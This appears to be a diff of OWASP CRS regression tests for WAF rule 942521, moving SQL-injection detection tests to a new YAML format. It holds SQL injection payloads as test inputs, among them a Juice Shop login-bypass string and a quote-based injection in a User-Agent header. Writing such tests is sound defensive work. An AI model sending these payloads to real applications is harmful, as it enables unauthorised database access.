0%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 18 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 19 desc: "Negative test: performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and starts_with(password) and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: 